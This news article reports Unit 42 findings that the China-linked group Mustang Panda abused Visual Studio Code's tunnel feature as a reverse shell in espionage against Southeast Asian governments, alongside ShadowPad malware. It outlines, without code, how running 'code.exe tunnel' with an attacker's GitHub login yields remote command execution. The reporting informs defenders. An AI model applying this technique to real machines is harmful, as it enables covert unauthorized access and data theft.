A China-affiliated advanced persistent threat (APT) group, Mustang Panda, has been identified exploiting Visual Studio Code software in espionage campaigns aimed at government organizations in Southeast Asia.
“Mustang Panda leveraged Visual Studio Code’s embedded reverse shell to infiltrate target networks,” stated Tom Fakterman, a researcher at Palo Alto Networks Unit 42. He labeled it a “relatively new technique” first demonstrated by Truvis Thornton in September 2023.
This operation is believed to extend an earlier campaign against an unnamed Southeast Asian government in late September 2023.
Active since 2012, Mustang Panda—also known by aliases like BASIN, Bronze President, and RedDelta—frequently conducts espionage targeting government and religious institutions across Europe and Asia, particularly in South China Sea nations.
The recent campaign stands out for its use of Visual Studio Code’s reverse shell to execute arbitrary code and deploy additional payloads.
“Attackers can exploit either the portable version of code.exe (Visual Studio Code’s executable) or an existing installation,” Fakterman explained. “By running the code.exe tunnel command, attackers obtain a link that requires logging into GitHub with their own account.”
After this step, the attacker gains access to a Visual Studio Code web environment linked to the compromised machine, enabling them to execute commands and create new files.
Notably, the malicious use of this method was first flagged by Dutch cybersecurity firm mnemonic in relation to a zero-day vulnerability in Check Point’s Network Security gateway products (CVE-2024-24919, CVSS score: 8.6), which has since been patched.
According to Unit 42, Mustang Panda utilized this approach to deploy malware, conduct reconnaissance, and exfiltrate sensitive data. The threat actor also leveraged OpenSSH to run commands, transfer files, and laterally move within the network.
Further analysis uncovered a secondary cluster of activity “occurring simultaneously and sometimes on the same endpoints,” which involved ShadowPad malware—a modular backdoor commonly used by Chinese espionage groups.
It remains uncertain whether these two intrusion clusters are connected or if different groups are “piggybacking on each other’s access.”
“Based on forensic analysis and the timeline, it’s plausible these clusters originated from the same threat actor (Stately Taurus),” said Fakterman. “However, other explanations, such as a collaborative effort between two Chinese APT groups, cannot be ruled out.”
Source: TheHackerNews
